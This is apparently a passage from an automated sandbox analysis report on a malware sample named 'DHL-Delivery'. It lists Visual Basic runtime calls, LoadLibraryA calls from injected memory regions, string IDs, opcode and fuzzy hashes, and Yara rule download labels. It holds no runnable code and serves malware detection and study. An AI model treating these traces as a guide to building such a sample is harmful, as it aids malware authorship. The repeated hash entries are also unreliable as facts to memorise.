                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F7F4
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000160), ref: 0040F83E
                        • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040F85D
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010,?,?,?,?,00000000,?,00000000,?,?,004011D6), ref: 0040F878
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F8B1
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6D4,00000058), ref: 0040F8F5
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040F91C
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F955
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000178), ref: 0040F9A2
                        • __vbaI4Var.MSVBVM60(?), ref: 0040F9F8
                        • __vbaChkstk.MSVBVM60(?,?,?), ref: 0040FA33
                        • __vbaChkstk.MSVBVM60(?,?,?), ref: 0040FA47
                        • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?,?,0033B88B,?,?,?,?,?), ref: 0040FAC0
                        • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0040FAD5
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FAF0
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FB29
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000170), ref: 0040FB73
                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040E54C,000006FC,?,?,?,5C48BED0,00005B07,?), ref: 0040FC07
                        • __vbaFreeObj.MSVBVM60(?,?,?,5C48BED0,00005B07,?), ref: 0040FC27
                        • __vbaFreeVar.MSVBVM60(?,?,?,5C48BED0,00005B07,?), ref: 0040FC2F
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010,?,?,?,5C48BED0,00005B07,?), ref: 0040FC47
                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,5C48BED0,00005B07,?), ref: 0040FC80
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000160,?,?,?,5C48BED0,00005B07,?), ref: 0040FCCA
                        • __vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000,?,?,?,5C48BED0,00005B07,?), ref: 0040FCE9
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040FD04
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FD3D
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000120), ref: 0040FD8A
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040FDB1
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FDEA
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6F8,00000070), ref: 0040FE31
                        • __vbaStrCopy.MSVBVM60(00000000,?,0040E6F8,00000070), ref: 0040FE4D
                        • __vbaChkstk.MSVBVM60(00001BD4,?,00000000), ref: 0040FEB3
                        • __vbaI4Var.MSVBVM60(?,?,00001BD4,?,00000000), ref: 0040FECF
                        • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0040FEED
                        • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,00000000), ref: 0040FF04
                        • __vbaFreeVar.MSVBVM60 ref: 0040FF0F
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040FF27
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FF60
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6B4,00000198), ref: 0040FFAA
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040FFD1
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041000A
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000160), ref: 00410054
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0041007B
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004100B4
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6B4,000001C0), ref: 00410101
                        • __vbaStrCopy.MSVBVM60(00000000,?,0040E6B4,000001C0), ref: 00410162
                        • __vbaChkstk.MSVBVM60(?), ref: 00410170
                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040E54C,00000700), ref: 004101C3
                        • __vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 004101E1
                        • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004101F7
                        • __vbaFreeVar.MSVBVM60 ref: 00410202
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0041021A
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410253
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6F8,000001DC), ref: 0041029D
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 004102C4
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004102FD
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000130), ref: 00410347
                        • __vbaLateIdCallLd.MSVBVM60(?,00000000,00000000,00000000), ref: 00410369
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 00410384
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004103BD
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6F8,00000198), ref: 00410407
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0041042E
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410467
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6F8,000000F8), ref: 004104B1
                        • __vbaChkstk.MSVBVM60(00000000,?,0040E6F8,000000F8), ref: 0041055C
                        • __vbaStrVarMove.MSVBVM60(?,00000008,002C9400,0000375E), ref: 00410587
                        • __vbaStrMove.MSVBVM60(?,00000008,002C9400,0000375E), ref: 00410591
                        • __vbaFreeStr.MSVBVM60 ref: 004105BA
                        • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 004105D5
                        • __vbaFreeVarList.MSVBVM60(00000004,00000008,?,00000008,00000008), ref: 004105F8
                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040E51C,000002B4), ref: 00410632
                        • __vbaOnError.MSVBVM60(00000001), ref: 00410648
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$CheckFreeHresult$New2$List$Chkstk$Move$CallCopyLate$#610$#540#562#704#711Ary1DerefError
                        • String ID: ^7$omregn$pseudoinspirational$tilkendende
                        • API String ID: 3417047510-2015756608
                        • Opcode ID: 963aac548ce047ad53cf4d369cb9e0238aff69dc94b36b69d2c7beb30a522c71
                        • Instruction ID: 9930bc61fc3dacaeb4dbef84097dc737169efedd166e4f38aba8d7488f7d4e75
                        • Opcode Fuzzy Hash: 963aac548ce047ad53cf4d369cb9e0238aff69dc94b36b69d2c7beb30a522c71
                        • Instruction Fuzzy Hash: 4CC20571900218DFDB20DF90CC45BDDBBB9BB08304F1045EAE609BB2A1DB795A99DF58
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0DBB, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 476libraryUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: f5234c9825c58b4e4cfeff7dc7c2d539e72c9b55ba1ed23977f23d87668f6550
                        • Instruction ID: 468864660f8f21b6a1c0b9f55b9cd07f7c4a01cfe35a77fd2c362b13d6011b89
                        • Opcode Fuzzy Hash: f5234c9825c58b4e4cfeff7dc7c2d539e72c9b55ba1ed23977f23d87668f6550
                        • Instruction Fuzzy Hash: 8FD19C5DEC5307B9EF34286849B97FA12574F577F0FAA022ADC96430C5E71784C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0DC1, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 424libraryUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: 2e46b7e7a12f829c12ed6fca399298779a66d2b5cb60b68caa9360eb807cc354
                        • Instruction ID: 76322e03a3a91efdde72527b252e1811cb5abd6833039a719376f99ef5835dcd
                        • Opcode Fuzzy Hash: 2e46b7e7a12f829c12ed6fca399298779a66d2b5cb60b68caa9360eb807cc354
                        • Instruction Fuzzy Hash: AFB16A5DEC5307B9EF38286849B57FB12574F537F0FAA022ADC9A830C5E72A80C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0DF8, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 416libraryUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: 51b39b1054d3278c65eb1c54a7a48d2da29df0160f5134753ca881bea61d6a9c
                        • Instruction ID: e9aa63952360819f719e1cedc5adf3ab7a838d93263f30c40851470e5fb97153
                        • Opcode Fuzzy Hash: 51b39b1054d3278c65eb1c54a7a48d2da29df0160f5134753ca881bea61d6a9c
                        • Instruction Fuzzy Hash: 0BB18E5DEC5307B9EF38286849B97FA12574F537F0FAA062ADC96870C5E71B80C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0E38, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 406libraryUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: a6d482aa354e33548a811ac390c7daa66c5f12c179186e9b85b7c28a260a35c6
                        • Instruction ID: 7307a18609d0acabf75b5c6160f2ac8096d3559a8ccc645d0f20bba473489de7
                        • Opcode Fuzzy Hash: a6d482aa354e33548a811ac390c7daa66c5f12c179186e9b85b7c28a260a35c6
                        • Instruction Fuzzy Hash: 5BB17B5DEC5307B9EF38286849B97FA12574F537F0FAA062ADC9A830C5E71B80C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0E7F, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 388libraryUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: c22452b96d167e6f59ef06ed4a7e00dd0c599e253b539c58003f27f435010465
                        • Instruction ID: 5f92d0e89ded0c3ac7dff5dfbfa1f40f7b09e349ff16cb45ce62047a8d81d471
                        • Opcode Fuzzy Hash: c22452b96d167e6f59ef06ed4a7e00dd0c599e253b539c58003f27f435010465
                        • Instruction Fuzzy Hash: E5B18C5DEC5306B9EF38286849B97FA12574F537F0FAA022BDC9A830C5E72784C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0EC5, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 380libraryUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: 83ca7df434e3d3dbc8a45800d54e02ea234eae5c728d35881cae03d3334922da
                        • Instruction ID: e66b50ad56f936ec16b6dfa5a6c49b9e5672379320881942f5a0edf229513890
                        • Opcode Fuzzy Hash: 83ca7df434e3d3dbc8a45800d54e02ea234eae5c728d35881cae03d3334922da
                        • Instruction Fuzzy Hash: 6DA17B5DEC4306B9EF38286849B57FB12575F537F0FAA022ADCAA431C5E72784C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0EF6, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 371libraryUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: 01f39ef496c6ea9d7868d5c379ee7d60d455b1895115c226b5f3992f9fd662d0
                        • Instruction ID: b762f1a39e4808acdf39d76532dafe6383525841509f050994a82c8ea74b0573
                        • Opcode Fuzzy Hash: 01f39ef496c6ea9d7868d5c379ee7d60d455b1895115c226b5f3992f9fd662d0
                        • Instruction Fuzzy Hash: DEA19D5DEC4306B9EF34286849B57FB12575F537F0FAA022ADC9A831C5E72784C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0F30, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 364libraryUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: 03b144a4af1b31d39a0c9346391acfa3369da8683ff20fe012e82cbabcec2db4
                        • Instruction ID: e29fa11bc74b1af60d7972303eb70c45c5e7ddbdbf391f5f3660bbc772e799b8
                        • Opcode Fuzzy Hash: 03b144a4af1b31d39a0c9346391acfa3369da8683ff20fe012e82cbabcec2db4
                        • Instruction Fuzzy Hash: AFA1AC5CEC4306B9EF38286849B57FB12574F537F0FAA021ADCAA831C5E72780C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0F5F, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 356libraryUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: be1d53fd2d931398e58f34eb5727bde9a7c9d5b46b4c2dd410d032b1ef6dd48e
                        • Instruction ID: 4195dcc64908774aeec90c089239377f3128e920ddfb55151e8d2c9ae4ed96cb
                        • Opcode Fuzzy Hash: be1d53fd2d931398e58f34eb5727bde9a7c9d5b46b4c2dd410d032b1ef6dd48e
                        • Instruction Fuzzy Hash: F0A19C5DEC4306B9EF38286849B97FB12675F537F0FAA421ADC9A831C5E7278086C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0FA8, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 340UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: 4ccac52502112bc6c297cda83aba8f231303d1a8027dc7a11ff2bf90b58cdd8f
                        • Instruction ID: 4fa1ca6c77792958ba2b7b4abb4a18094e3a5241feb4b8ade0ae7df0953998cf
                        • Opcode Fuzzy Hash: 4ccac52502112bc6c297cda83aba8f231303d1a8027dc7a11ff2bf90b58cdd8f
                        • Instruction Fuzzy Hash: 8691AE5DEC4306B9EF38286849B97FB12675F537F0FAA421ADC9A831C4E72780C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0FE7, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 328UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: a62c563c053407a450380b6dbc4b12bd83dbcee562de140cbe2f0171cb8b7ed5
                        • Instruction ID: 431f80747b67f86ed95a5e1a45a745a7d08ad693cd418cab3a7e146a529bec55
                        • Opcode Fuzzy Hash: a62c563c053407a450380b6dbc4b12bd83dbcee562de140cbe2f0171cb8b7ed5
                        • Instruction Fuzzy Hash: D491BD5DEC5306B9EF38287849B97FB12574F537F0FAA422ADC9A831C4E72680C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A101D, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 320libraryUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: 16c6c4dc7b05c6ec224be8e71f7ff6c1a57086f1a1530c355cb352edd4084664
                        • Instruction ID: ee3032c32e70fc0eb84c9ae5e1c264769cfc4ae10cda1a58968fae8682392d74
                        • Opcode Fuzzy Hash: 16c6c4dc7b05c6ec224be8e71f7ff6c1a57086f1a1530c355cb352edd4084664
                        • Instruction Fuzzy Hash: 2C81CE5DEC5306B9EF38286849B97FB12534F537F0FAA022ADC9A831C5E32680C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A1066, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 304UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: cd2b0cf99edb312f299551c7ce8bfb8c3ee366c2305eb0daf5c368106325d480
                        • Instruction ID: 39c8e001985d2e232375db6f2aaee375e1277759dbea840fcc7e6e57a9329fbf
                        • Opcode Fuzzy Hash: cd2b0cf99edb312f299551c7ce8bfb8c3ee366c2305eb0daf5c368106325d480
                        • Instruction Fuzzy Hash: F781C05DEC4306B9EF39286849B97FB12535F537F0FAA422ADCDA831C5E72680C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A10A2, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: a4f2224c4e11eb91240c85a37bd5b32f810b91f3bc4cfb7d8795e985c06c115a
                        • Instruction ID: eeb787006954f41d1c30cc428e910b873cc64f6eee6303885d6c4f3640742cc0
                        • Opcode Fuzzy Hash: a4f2224c4e11eb91240c85a37bd5b32f810b91f3bc4cfb7d8795e985c06c115a
                        • Instruction Fuzzy Hash: F271B05DEC5306B9EF38286849B57FB02635F537F0FAA422ADCDA831C5E72680C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A10E1, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 281UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        • Opcode ID: 0a3556ef195fa7465cded5e60cad677bd0d2fea7b7e935752ec48c0886389ca2
                        • Instruction ID: 31392968e870da017b933084baf4ecde7b322b26935b307aec65afffc455fcdb
                        • Opcode Fuzzy Hash: 0a3556ef195fa7465cded5e60cad677bd0d2fea7b7e935752ec48c0886389ca2
                        • Instruction Fuzzy Hash: 01718F5DEC5306B9EF34246C49797FB02534F537F0FA9462ADCDA831C5E7668086C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A1114, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 272UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        • Opcode ID: 9a0710667f44c8f964a1953deb41d1cc472cc7ef21dd19f81bda7e151cbf791a
                        • Instruction ID: 5df9168d3c42d65560a3c2a3648bb9ed1700f740d72da48fe3c690299e7a583b
                        • Opcode Fuzzy Hash: 9a0710667f44c8f964a1953deb41d1cc472cc7ef21dd19f81bda7e151cbf791a
                        • Instruction Fuzzy Hash: AB71B05DEC5306B9DF34286C49B97FB02534F537F0FAA462ADC9B831C5E7268086C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A114A, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        • Opcode ID: 97d01955d5a94ccb1b8fb42d7815850bebbc2fd70a8cdcda6348f596b94eec4b
                        • Instruction ID: 9a7ca02ba3c116170a81cd6ec0428373e255fa27f88bfe9c575fca5c3310f600
                        • Opcode Fuzzy Hash: 97d01955d5a94ccb1b8fb42d7815850bebbc2fd70a8cdcda6348f596b94eec4b
                        • Instruction Fuzzy Hash: EF61C05DEC5306B9EF34286C4AB97FB02534F537F0FA6462ADCDA831C5E7268086C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A1184, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        • Opcode ID: e8b5515ac391a3c3afc7c7f47876c4a404a2afaff4bf34a9856eb64db058f996
                        • Instruction ID: a115512e553bc0794b938c873399d04977a835315583b41e90dd480953629114
                        • Opcode Fuzzy Hash: e8b5515ac391a3c3afc7c7f47876c4a404a2afaff4bf34a9856eb64db058f996
                        • Instruction Fuzzy Hash: AC61BE5DEC4306B9DF3428684AB97FB02534F577F0FA5462ADCEA831C5E72680C6C552
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A11D3, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 239UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        • Opcode ID: 0da9174a8f47eb413f315ff6a2f5706e7c43351fbce211732f290fa10580d115
                        • Instruction ID: 3e5e4289bbf37f9f5420dd6437a0af0547b168e2beb00c9f8a2bbdf42760d524
                        • Opcode Fuzzy Hash: 0da9174a8f47eb413f315ff6a2f5706e7c43351fbce211732f290fa10580d115
                        • Instruction Fuzzy Hash: E751BF5DEC4306B9DF34286C4AB97FA02534F577F0FA9462ADCAA831C5F72680C6C552
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A121D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 232UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        • Opcode ID: 26d12948a0f5e1e9c2a9d7040c1b89b07ac2f1e03a3cf2a5bcd4f1155a242f69
                        • Instruction ID: 898c53cccce5e9dd2b786ca0f824497a051d3e85fcbb8551ae816bba2e858269
                        • Opcode Fuzzy Hash: 26d12948a0f5e1e9c2a9d7040c1b89b07ac2f1e03a3cf2a5bcd4f1155a242f69
                        • Instruction Fuzzy Hash: C851AC6DEC4307BDDF3428684AB97FB12934F577F0FA9461ADCAA831C1E3268086C552
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A125D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 207UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        • Opcode ID: 06e0bb1e902619b11e5fc572afdea020058c42ce15d3c08e566af61c6af641e1
